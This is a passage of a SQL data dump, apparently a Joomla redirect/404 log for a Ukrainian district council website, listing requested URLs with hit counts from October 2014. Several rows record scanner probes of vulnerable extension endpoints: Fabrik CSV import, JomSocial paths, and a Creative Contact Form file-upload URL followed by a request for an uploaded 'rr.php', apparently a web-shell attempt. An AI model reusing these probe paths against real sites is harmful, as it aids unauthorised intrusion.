00:00:00',301),(8925,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1213:2014-02-14-13-53-12&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-22 06:47:36','0000-00-00 00:00:00',301),(8926,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=ru&Itemid=','','','',14,0,'2014-10-22 09:04:04','0000-00-00 00:00:00',301),(8927,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-------2013--------i--2014--&catid=36&Itemid=70&lang=uk','','','',8,0,'2014-10-22 09:06:04','0000-00-00 00:00:00',301),(8928,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=en&Itemid=0','','','',8,0,'2014-10-22 09:06:40','0000-00-00 00:00:00',301),(8929,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&lang=uk','','','',7,0,'2014-10-22 09:55:48','0000-00-00 00:00:00',301),(8930,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1378:2014-08-27-11-29-34&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-22 09:56:11','0000-00-00 00:00:00',301),(8931,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1102:2013-10-03-08-08-33&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-22 11:07:37','0000-00-00 00:00:00',301),(8932,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&lang=en&Itemid=','','','',10,0,'2014-10-22 11:48:06','0000-00-00 00:00:00',301),(8933,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:-2012-2015-&catid=59:--20062014-&Itemid=107&lang=ru','','','',7,0,'2014-10-22 11:53:55','0000-00-00 00:00:00',301),(8934,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-10-22 14:35:42','0000-00-00 00:00:00',301),(8935,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&lang=ru&Itemid=','','','',5,0,'2014-10-22 14:36:14','0000-00-00 00:00:00',301),(8936,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1251:2014-03-24-07-11-22&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-10-22 14:50:45','0000-00-00 00:00:00',301),(8937,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=uk&Itemid=0','','','',10,0,'2014-10-22 14:51:32','0000-00-00 00:00:00',301),(8938,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-------2013--------i--2014--&catid=36&Itemid=70&lang=ru','','','',10,0,'2014-10-22 14:55:28','0000-00-00 00:00:00',301),(8939,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-10-22 14:58:02','0000-00-00 00:00:00',301),(8940,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-10-22 14:58:56','0000-00-00 00:00:00',301),(8941,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=ru&Itemid=','','','',9,0,'2014-10-22 15:11:24','0000-00-00 00:00:00',301),(8942,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1378:2014-08-27-11-29-34&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-22 15:58:39','0000-00-00 00:00:00',301),(8943,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1338:2014-06-11-14-18-06&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-22 16:10:50','0000-00-00 00:00:00',301),(8944,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1123:-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-22 20:28:10','0000-00-00 00:00:00',301),(8945,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1172:2014-01-14-14-46-07&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-22 21:43:07','0000-00-00 00:00:00',301),(8946,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=992:-3-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-22 21:54:28','0000-00-00 00:00:00',301),(8947,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=en','','','',4,0,'2014-10-23 00:18:31','0000-00-00 00:00:00',301),(8948,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=uk&Itemid=','','','',14,0,'2014-10-23 01:25:59','0000-00-00 00:00:00',301),(8949,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:-2013-2017-&catid=49:--12042013-&Itemid=88&lang=ru','','','',5,0,'2014-10-23 07:23:34','0000-00-00 00:00:00',301),(8950,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=945:2013-03-04-07-28-58&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-23 13:02:17','0000-00-00 00:00:00',301),(8951,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1254:-1-50&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-23 14:21:43','0000-00-00 00:00:00',301),(8952,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&lang=ru','','','',1,0,'2014-10-23 15:30:23','0000-00-00 00:00:00',301),(8953,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/446-pro-zatverdzhennja-dogovoru-pro-nadannja-subvencii_2','',12,0,'2014-10-23 15:36:46','0000-00-00 00:00:00',301),(8954,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1039:-l-r&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-23 15:52:34','0000-00-00 00:00:00',301),(8955,'http://www.malyn-rayrada.org.ua/content/components/com_community/index.html','','','',1,0,'2014-10-23 16:50:22','0000-00-00 00:00:00',301),(8956,'http://www.malyn-rayrada.org.ua/content/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-23 16:50:26','0000-00-00 00:00:00',301),(8957,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=940:2013-02-21-14-02-14&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-23 17:04:46','0000-00-00 00:00:00',301),(8958,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1096:2013-09-24-13-34-16&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-23 19:44:21','0000-00-00 00:00:00',301),(8959,'http://www.malyn-rayrada.org.ua/press_content.php/components/com_community/index.html','','','',1,0,'2014-10-23 21:31:55','0000-00-00 00:00:00',301),(8960,'http://www.malyn-rayrada.org.ua/press_content.php/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-23 21:32:00','0000-00-00 00:00:00',301),(8961,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=983:2013-04-04-11-23-57&catid=49:--12042013-&Itemid=88&lang=uk','','','',3,0,'2014-10-23 21:49:17','0000-00-00 00:00:00',301),(8962,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1087:--------12--2013---398-l-------2013-r---19--2013---416-l-------2013-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-10-23 22:07:30','0000-00-00 00:00:00',301),(8963,'http://malyn-rayrada.org.ua/nou/components/com_community/index.html','','','',1,0,'2014-10-23 23:43:29','0000-00-00 00:00:00',301),(8964,'http://malyn-rayrada.org.ua/nou/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-23 23:43:33','0000-00-00 00:00:00',301),(8965,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=903:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-10-24 00:41:48','0000-00-00 00:00:00',301),(8966,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-l-28r-&catid=51&Itemid=92&lang=uk','','','',4,0,'2014-10-24 01:59:46','0000-00-00 00:00:00',301),(8967,'http://malyn-rayrada.org.ua/malva/components/com_community/index.html','','','',2,0,'2014-10-24 03:40:42','0000-00-00 00:00:00',301),(8968,'http://malyn-rayrada.org.ua/malva/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2014-10-24 03:40:46','0000-00-00 00:00:00',301),(8969,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&Itemid=14&lang=en','','','',1,0,'2014-10-24 05:00:42','0000-00-00 00:00:00',301),(8970,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-24 07:11:06','0000-00-00 00:00:00',301),(8971,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:------------2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-10-24 08:18:55','0000-00-00 00:00:00',301),(8972,'http://www.malyn-rayrada.org.ua/3/components/com_community/index.html','','','',1,0,'2014-10-24 08:21:28','0000-00-00 00:00:00',301),(8973,'http://www.malyn-rayrada.org.ua/3/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-24 08:21:31','0000-00-00 00:00:00',301),(8974,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-10-24 08:42:13','0000-00-00 00:00:00',301),(8975,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-24 08:59:21','0000-00-00 00:00:00',301),(8976,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-10-24 09:03:20','0000-00-00 00:00:00',301),(8977,'http://www.malyn-rayrada.org.ua/i/components/com_community/index.html','','','',1,0,'2014-10-24 09:17:27','0000-00-00 00:00:00',301),(8978,'http://www.malyn-rayrada.org.ua/i/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-24 09:17:32','0000-00-00 00:00:00',301),(8979,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-24 09:36:51','0000-00-00 00:00:00',301),(8980,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-10-24 09:52:56','0000-00-00 00:00:00',301),(8981,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=51&Itemid=92&lang=uk','','','',3,0,'2014-10-24 10:12:13','0000-00-00 00:00:00',301),(8982,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1270:2014-04-08-13-49-40&lang=ru&option=com_content&view=article','','http://go.mail.ru/search?q=%D0%92%D0%B7%D0%B0%D0%B5%D0%BC%D0%BE%D0%B4%D1%96%D1%8F%20%D0%BF%D1%96%D0%B4%D1%80%D0%BE%D0%B7%D0%B4%D1%96%D0%BB%D1%83%20%D0','',6,0,'2014-10-24 11:34:25','0000-00-00 00:00:00',301),(8983,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=932:-l90-r&catid=47&Itemid=86&lang=en','','','',1,0,'2014-10-24 11:56:29','0000-00-00 00:00:00',301),(8984,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1092:2013-09-19-12-18-37&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-10-24 13:46:45','0000-00-00 00:00:00',301),(8985,'http://www.malyn-rayrada.org.ua/malswitch/components/com_community/index.html','','','',15,0,'2014-10-24 15:38:14','0000-00-00 00:00:00',301),(8986,'http://www.malyn-rayrada.org.ua/malswitch/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',15,0,'2014-10-24 15:38:20','0000-00-00 00:00:00',301),(8987,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-10-24 19:11:27','0000-00-00 00:00:00',301),(8988,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-10-24 19:15:11','0000-00-00 00:00:00',301),(8989,'http://www.malyn-rayrada.org.ua/web/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',5,0,'2014-10-24 20:21:44','0000-00-00 00:00:00',301),(8990,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-24 21:07:12','0000-00-00 00:00:00',301),(8991,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1378:2014-08-27-11-29-34&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-24 21:24:52','0000-00-00 00:00:00',301),(8992,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&lang=en','','','',3,0,'2014-10-24 22:12:53','0000-00-00 00:00:00',301),(8993,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1377:-23-&catid=11&lang=uk&Itemid=0','','','',4,0,'2014-10-24 22:56:59','0000-00-00 00:00:00',301),(8994,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-25 01:55:50','0000-00-00 00:00:00',301),(8995,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1089:--------l---r---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-25 03:10:21','0000-00-00 00:00:00',301),(8996,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-25 03:37:35','0000-00-00 00:00:00',301),(8997,'http://malyn-rayrada.org.ua/components/com_community/LICENSE.php','','','',4,0,'2014-10-25 05:04:50','0000-00-00 00:00:00',301),(8998,'http://www.malyn-rayrada.org.ua/components/com_community/LICENSE.php','','','',7,0,'2014-10-25 07:22:40','0000-00-00 00:00:00',301),(8999,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=56&Itemid=97&lang=ru','','','',9,0,'2014-10-25 08:09:23','0000-00-00 00:00:00',301),(9000,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',14,0,'2014-10-25 10:58:09','0000-00-00 00:00:00',301),(9001,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-10-25 11:31:11','0000-00-00 00:00:00',301),(9002,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-10-25 12:20:20','0000-00-00 00:00:00',301),(9003,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&lang=uk','','','',2,0,'2014-10-25 13:19:30','0000-00-00 00:00:00',301),(9004,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-25 13:39:12','0000-00-00 00:00:00',301),(9005,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:---------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-25 13:44:37','0000-00-00 00:00:00',301),(9006,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-25 14:00:11','0000-00-00 00:00:00',301),(9007,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-----------2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2014-10-25 16:08:10','0000-00-00 00:00:00',301),(9008,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-25 16:42:30','0000-00-00 00:00:00',301),(9009,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-25 19:32:01','0000-00-00 00:00:00',301),(9010,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-25 20:04:15','0000-00-00 00:00:00',301),(9011,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-10-25 20:42:29','0000-00-00 00:00:00',301),(9012,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&catid=56:--03022014-&Itemid=97&lang=uk','','','',10,0,'2014-10-25 20:50:58','0000-00-00 00:00:00',301),(9013,'http://www.malyn-rayrada.org.ua/strona/components/com_community/index.html','','','',3,0,'2014-10-25 21:41:38','0000-00-00 00:00:00',301),(9014,'http://www.malyn-rayrada.org.ua/strona/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',3,0,'2014-10-25 21:41:42','0000-00-00 00:00:00',301),(9015,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1030:2013-06-17-06-46-59&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',7,0,'2014-10-25 22:05:46','0000-00-00 00:00:00',301),(9016,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7&lang=en','','','',5,0,'2014-10-25 22:48:58','0000-00-00 00:00:00',301),(9017,'http://malyn-rayrada.org.ua/informes/components/com_community/index.html','','','',1,0,'2014-10-25 23:03:00','0000-00-00 00:00:00',301),(9018,'http://malyn-rayrada.org.ua/informes/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-25 23:03:10','0000-00-00 00:00:00',301),(9019,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-26 00:38:25','0000-00-00 00:00:00',301),(9020,'http://www.malyn-rayrada.org.ua/etrg/components/com_community/index.html','','','',3,0,'2014-10-26 00:54:13','0000-00-00 00:00:00',301),(9021,'http://www.malyn-rayrada.org.ua/etrg/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',3,0,'2014-10-26 00:54:17','0000-00-00 00:00:00',301),(9022,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1038:2013-06-28-10-19-47&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-26 02:52:32','0000-00-00 00:00:00',301),(9023,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-26 04:48:59','0000-00-00 00:00:00',301),(9024,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-26 06:44:16','0000-00-00 00:00:00',301),(9025,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&lang=en','','','',5,0,'2014-10-26 08:00:31','0000-00-00 00:00:00',301),(9026,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&catid=54:--29112013-&Itemid=95&lang=en','','','',1,0,'2014-10-26 08:35:09','0000-00-00 00:00:00',301),(9027,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=ru&Itemid=','','','',6,0,'2014-10-26 09:36:30','0000-00-00 00:00:00',301),(9028,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-26 11:01:14','0000-00-00 00:00:00',301),(9029,'http://www.malyn-rayrada.org.ua/domains/components/com_community/index.html','','','',2,0,'2014-10-26 11:39:51','0000-00-00 00:00:00',301),(9030,'http://www.malyn-rayrada.org.ua/domains/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2014-10-26 11:39:56','0000-00-00 00:00:00',301),(9031,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-26 13:05:16','0000-00-00 00:00:00',301),(9032,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-26 15:24:35','0000-00-00 00:00:00',301),(9033,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',12,0,'2014-10-26 17:05:06','0000-00-00 00:00:00',301),(9034,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:---------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-10-26 17:54:44','0000-00-00 00:00:00',301),(9035,'http://www.malyn-rayrada.org.ua/mu157/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',3,0,'2014-10-26 18:06:40','0000-00-00 00:00:00',301),(9036,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1257:2014-03-29-18-03-31&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-26 18:19:34','0000-00-00 00:00:00',301),(9037,'http://www.malyn-rayrada.org.ua/samba/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-26 19:55:11','0000-00-00 00:00:00',301),(9038,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1095:2013-09-24-13-25-55&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-26 21:15:08','0000-00-00 00:00:00',301),(9039,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-10-26 21:15:09','0000-00-00 00:00:00',301),(9040,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1377:-23-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-26 21:47:10','0000-00-00 00:00:00',301),(9041,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=929:2013-02-21-09-11-26&catid=47:-21022013-&Itemid=86&lang=en','','','',1,0,'2014-10-26 22:27:42','0000-00-00 00:00:00',301),(9042,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=924:2013-02-20-19-06-08&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-26 22:43:08','0000-00-00 00:00:00',301),(9043,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:------------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-26 23:46:53','0000-00-00 00:00:00',301),(9044,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-26 23:51:38','0000-00-00 00:00:00',301),(9045,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1298:2014-04-24-11-02-55&lang=uk&option=com_content&view=article','','','',6,0,'2014-10-27 00:16:23','0000-00-00 00:00:00',301),(9046,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=844:-2013-&lang=uk&option=com_content&view=article','','','',5,0,'2014-10-27 00:16:24','0000-00-00 00:00:00',301),(9047,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1114:-lr-&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-27 00:16:26','0000-00-00 00:00:00',301),(9048,'http://www.malyn-rayrada.org.ua/components/com_creativecontactform/fileupload/index.php','','','',23,0,'2014-10-27 02:18:50','0000-00-00 00:00:00',301),(9049,'http://www.malyn-rayrada.org.ua/components/com_creativecontactform/fileupload/files/rr.php','','','',12,0,'2014-10-27 02:18:57','0000-00-00 00:00:00',301),(9050,'http://www.malyn-rayrada.org.ua/k/components/com_creativecontactform/fileupload/index.php','','','',2,0,'2014-10-27 02:19:03','0000-00-00 00:00:00',301),(9051,'http://www.malyn-rayrada.org.ua/k/components/com_creativecontactform/fileupload/files/rr.php','','','',1,0,'2014-10-27 02:19:12','0000-00-00 00:00:00',301),(9052,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=en','','','',4,0,'2014-10-27 02:42:07','0000-00-00 00:00:00',301),(9053,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-27 02:45:17','0000-00-00 00:00:00',301),(9054,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-27 02:46:13','0000-00-00 00:00:00',301),(9055,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1051:--------4------&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-27 03:23:56','0000-00-00 00:00:00',301),(9056,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1342:2014-06-12-09-42-47&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-27 03:43:41','0000-00-00 00:00:00',301),(9057,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-10-27 03:55:51','0000-00-00 00:00:00',301),(9058,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&Itemid=14&lang=en','','','',75,0,'2014-10-27 03:55:55','0000-00-00 00:00:00',301),(9059,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-------2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-10-27 05:31:06','0000-00-00 00:00:00',301),(9060,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-27 06:29:37','0000-00-00 00:00:00',301),(9061,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=844:-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-27 06:31:39','0000-00-00 00:00:00',301),(9062,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1018:2013-06-06-11-22-34&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-27 06:32:05','0000-00-00 00:00:00',301),(9063,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1266:2014-04-03-05-25-14&lang=uk&option=com_content&view=article','','','',7,0,'2014-10-27 06:51:46','0000-00-00 00:00:00',301),(9064,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1129:2013-11-06-13-36-25&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-27 06:52:00','0000-00-00 00:00:00',301),(9065,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-10-27 07:22:30','0000-00-00 00:00:00',301),(9066,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=319:-2009-2011-&catid=33&Itemid=66&lang=uk','','','',4,0,'2014-10-27 08:07:19','0000-00-00 00:00:00',301),(9067,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1251:2014-03-24-07-11-22&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-27 08:25:54','0000-00-00 00:00:00',301),(9068,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1135:2013-11-15-07-00-15&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-27 09:39:09','0000-00-00 